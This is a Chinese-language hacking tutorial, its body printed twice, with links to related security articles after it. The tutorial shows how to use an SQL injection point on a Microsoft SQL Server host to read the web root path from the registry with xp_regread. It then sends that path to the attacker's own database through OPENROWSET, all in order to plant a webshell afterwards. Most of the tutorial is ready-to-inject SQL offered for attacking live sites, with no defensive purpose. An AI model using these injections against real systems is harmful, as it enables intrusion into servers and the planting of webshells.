滲透中用openrowset搞shell的方法
更新時(shí)間:2006年12月07日 00:00:00 作者:
滲透中用openrowset搞shell的方法
得到SQL注入點(diǎn),首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,發(fā)現(xiàn)屏蔽了SQL錯(cuò)誤信息,得不到物理路徑,那還寫個(gè)PP馬了.
聯(lián)想到一個(gè)權(quán)限不是很高的命令openrowset,進(jìn)行跨庫服務(wù)器查詢,就是把一個(gè)SQL命令發(fā)送到遠(yuǎn)程數(shù)據(jù)庫,然后看返回的結(jié)果,但是要啟動(dòng)事件跟蹤!我們可以把網(wǎng)站信息寫入數(shù)據(jù)庫,然后%$^%$@#$@^%$~
首先在自己機(jī)器建立SQL數(shù)據(jù)庫
然后在對(duì)方機(jī)器上建立個(gè)表 create table [dbo].[fenggou]([cha8][char](255))--
在對(duì)方執(zhí)行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('select a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密碼'', ''select * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--
這樣fenggou這個(gè)表里就會(huì)有這樣一條記錄select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a
不用說,''D:\WEB"就是從注冊(cè)表里讀出的物理路徑拉.然后執(zhí)行DECLARE @a1 char(255) set @a1=(select cha8 FROM fenggou) exec (@a1);--
等于執(zhí)行了select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a
OK,這時(shí)你在你機(jī)器上SQL事件追蹤器上就會(huì)顯示select * FROM pubs.dbo.authors where au_fname='D:\WEB,,1'
哇 哈哈哈哈哈 物理路徑到手了 寫小馬傳大馬吧~
得到SQL注入點(diǎn),首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,發(fā)現(xiàn)屏蔽了SQL錯(cuò)誤信息,得不到物理路徑,那還寫個(gè)PP馬了.
聯(lián)想到一個(gè)權(quán)限不是很高的命令openrowset,進(jìn)行跨庫服務(wù)器查詢,就是把一個(gè)SQL命令發(fā)送到遠(yuǎn)程數(shù)據(jù)庫,然后看返回的結(jié)果,但是要啟動(dòng)事件跟蹤!我們可以把網(wǎng)站信息寫入數(shù)據(jù)庫,然后%$^%$@#$@^%$~
首先在自己機(jī)器建立SQL數(shù)據(jù)庫
然后在對(duì)方機(jī)器上建立個(gè)表 create table [dbo].[fenggou]([cha8][char](255))--
在對(duì)方執(zhí)行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('select a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密碼'', ''select * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--
這樣fenggou這個(gè)表里就會(huì)有這樣一條記錄select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a
不用說,''D:\WEB"就是從注冊(cè)表里讀出的物理路徑拉.然后執(zhí)行DECLARE @a1 char(255) set @a1=(select cha8 FROM fenggou) exec (@a1);--
等于執(zhí)行了select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a
OK,這時(shí)你在你機(jī)器上SQL事件追蹤器上就會(huì)顯示select * FROM pubs.dbo.authors where au_fname='D:\WEB,,1'
哇 哈哈哈哈哈 物理路徑到手了 寫小馬傳大馬吧~
相關(guān)文章
最詳細(xì)的SQL注入相關(guān)的命令整理 (轉(zhuǎn))
這篇文章主要為打擊分享下一些常用SQL注入相關(guān)的命令,今天幫客戶做安裝的時(shí)候發(fā)現(xiàn)他的網(wǎng)站有很多漏洞,導(dǎo)致注入數(shù)據(jù)庫也被清空了,希望大家多關(guān)于安全2006-12-12
黑客入侵Windows XP系統(tǒng)常用七大招數(shù)
黑客入侵Windows XP系統(tǒng)常用七大招數(shù)...2006-10-10
注冊(cè)驗(yàn)證java代碼[針對(duì)上篇文章]
注冊(cè)驗(yàn)證代碼[針對(duì)上篇文章] ,大家可以多參考腳本之家以前發(fā)布的文章。2009-08-08
分析攻擊IP來源地與防御IP攻擊的應(yīng)對(duì)策略
今天小編就為大家分享一篇關(guān)于分析攻擊IP來源地并畫出餅圖的文章,小編覺得內(nèi)容挺不錯(cuò)的,現(xiàn)在分享給大家,具有很好的參考價(jià)值,需要的朋友一起跟隨小編來看看吧2018-09-09
Iptables防火墻tcp-flags模塊擴(kuò)展匹配規(guī)則詳解
這篇文章主要為大家介紹了Iptables防火墻tcp-flags模塊擴(kuò)展匹配規(guī)則詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪2022-08-08

